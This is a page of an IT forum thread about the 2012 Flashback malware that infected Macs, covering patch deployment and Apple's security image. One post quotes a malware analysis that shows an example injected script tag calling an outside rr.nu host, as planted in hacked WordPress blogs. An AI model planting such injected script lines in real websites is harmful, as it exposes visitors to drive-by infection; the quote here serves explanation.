+ Post New Thread
Page 3 of 3 FirstFirst 123
Results 31 to 40 of 40
General Chat Thread, 600000 macs infected in General; Originally Posted by localzuk How about, on Windows, these plugin makers work with Microsoft and release their updates via the ...
  1. #31

    SYNACK's Avatar
    Join Date
    Oct 2007
    Posts
    10,691
    Thank Post
    824
    Thanked 2,570 Times in 2,187 Posts
    Blog Entries
    9
    Rep Power
    731
    Quote Originally Posted by localzuk View Post
    How about, on Windows, these plugin makers work with Microsoft and release their updates via the Microsoft Update platform. A single unified update platform for all software would be great.

    Kinda like APT in Linux...
    They managed it with the drivers, the other placesa would have to give up some control and their horrific update platforms but yes this would be the ideal solution.

  2. #32

    Michael's Avatar
    Join Date
    Dec 2005
    Location
    Birmingham
    Posts
    8,941
    Thank Post
    232
    Thanked 1,510 Times in 1,206 Posts
    Rep Power
    328
    On Adobe's Flash distribution page, it does state -

    Customers using the Microsoft System Center Updates Publisher 4.5 can import the Flash Player Catalog for deployment via WSUS 3.0 SP2
    Why you can't just download the file and import directly into WSUS 3.0 SP2 is unclear.

  3. #33

    SYNACK's Avatar
    Join Date
    Oct 2007
    Posts
    10,691
    Thank Post
    824
    Thanked 2,570 Times in 2,187 Posts
    Blog Entries
    9
    Rep Power
    731
    Quote Originally Posted by Michael View Post
    On Adobe's Flash distribution page, it does state -



    Why you can't just download the file and import directly into WSUS 3.0 SP2 is unclear.
    Messing with the WSUS DB is considered a premium feature, come to think of it there is an open source program - Local Update Publisher - that may let it be imported though. Unfortunatly its not automated so its just as much, if not more trouble than simply pushing out the new MSI through GPO every month or two.

  4. #34

    Michael's Avatar
    Join Date
    Dec 2005
    Location
    Birmingham
    Posts
    8,941
    Thank Post
    232
    Thanked 1,510 Times in 1,206 Posts
    Rep Power
    328
    Yep and the fact it takes 5 mins of someone's time to download and deploy an MSI.

  5. #35


    Join Date
    Feb 2007
    Location
    51.405546, -0.510212
    Posts
    8,123
    Thank Post
    203
    Thanked 2,389 Times in 1,769 Posts
    Rep Power
    704
    Quote Originally Posted by Michael View Post
    Yep and the fact it takes 5 mins of someone's time to download and deploy an MSI.
    Don't forgot to add the time it takes to initially create an MST (to disable the updater and the Java Quick Starter service) and to test the deployment to ensure each update installs/uninstalls cleanly and doesn't break any apps/websites.
    Last edited by Arthur; 14th April 2012 at 01:58 PM.

  6. #36


    Join Date
    Feb 2007
    Location
    51.405546, -0.510212
    Posts
    8,123
    Thank Post
    203
    Thanked 2,389 Times in 1,769 Posts
    Rep Power
    704

  7. #37


    Join Date
    Feb 2007
    Location
    51.405546, -0.510212
    Posts
    8,123
    Thank Post
    203
    Thanked 2,389 Times in 1,769 Posts
    Rep Power
    704
    It looks like compromised Wordpress blogs are the infection vector for Flashback...

    The anatomy of Flashfake. Part 1
    Around the end of February/early March 2012, tens of thousands of sites powered by WordPress were compromised. How this happened is unclear. The main theories are that bloggers were using vulnerable versions of WordPress or they had installed the ToolsPack plugin. Websense put the number of affected sites at 30,000, while other companies say the figure could be as high as 100,000. Approximately 85% of the compromised blogs are located in the US.

    Code was injected into the main pages when the blogs were hacked. Constructions of the following type were added to the code (example):

    <script src="http://domainname.rr.nu/nl.php?p=d"></script>

    As a result, when any of the compromised sites were visited, a partner program TDS was contacted. Depending on the operating system and browser version, the browser then performed a hidden redirect to sites in the rr.nu domain zone that had the appropriate set of exploits installed on them to carry out an infection.

  8. #38

    Michael's Avatar
    Join Date
    Dec 2005
    Location
    Birmingham
    Posts
    8,941
    Thank Post
    232
    Thanked 1,510 Times in 1,206 Posts
    Rep Power
    328
    Unfortunately there are doubts now whether or not the patch has actually worked.

    It really is a worrying time for Mac users, especially as many users believe they cannot be infected.

  9. #39

    SYNACK's Avatar
    Join Date
    Oct 2007
    Posts
    10,691
    Thank Post
    824
    Thanked 2,570 Times in 2,187 Posts
    Blog Entries
    9
    Rep Power
    731
    Quote Originally Posted by Michael View Post
    Unfortunately there are doubts now whether or not the patch has actually worked.

    It really is a worrying time for Mac users, especially as many users believe they cannot be infected.
    Logic fail, if they don't know about it how can they be worried about it

  10. #40

    Michael's Avatar
    Join Date
    Dec 2005
    Location
    Birmingham
    Posts
    8,941
    Thank Post
    232
    Thanked 1,510 Times in 1,206 Posts
    Rep Power
    328
    Quote Originally Posted by SYNACK View Post
    Logic fail, if they don't know about it how can they be worried about it
    Very true, but I blame Apple personally. The amount of times I've spoken with someone that said "Oh in the Apple shop, the salesman told me Macs cannot get viruses" which obviously appeals to consumers, but it simply isn't true.

    It all boils down to market share. Create a virus that targets 90% of the market or 10% of the market. The answer is obvious, but love them or hate them, virus/malware writers are clever people and are exploiting the knowledge some individuals think Apple Macs cannot get viruses.

SHARE:
+ Post New Thread
Page 3 of 3 FirstFirst 123

Similar Threads

  1. Replies: 0
    Last Post: 29th March 2012, 05:16 PM
  2. mini macs and midi
    By russdev in forum Mac
    Replies: 7
    Last Post: 29th November 2005, 02:08 PM
  3. for all those who like widgets on mac
    By russdev in forum Educational Software
    Replies: 3
    Last Post: 25th July 2005, 07:19 PM
  4. Mac Software?
    By dagza in forum Mac
    Replies: 9
    Last Post: 22nd July 2005, 09:44 PM
  5. How are your mac's connected ?
    By daveyboy in forum Mac
    Replies: 11
    Last Post: 16th July 2005, 01:52 PM

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •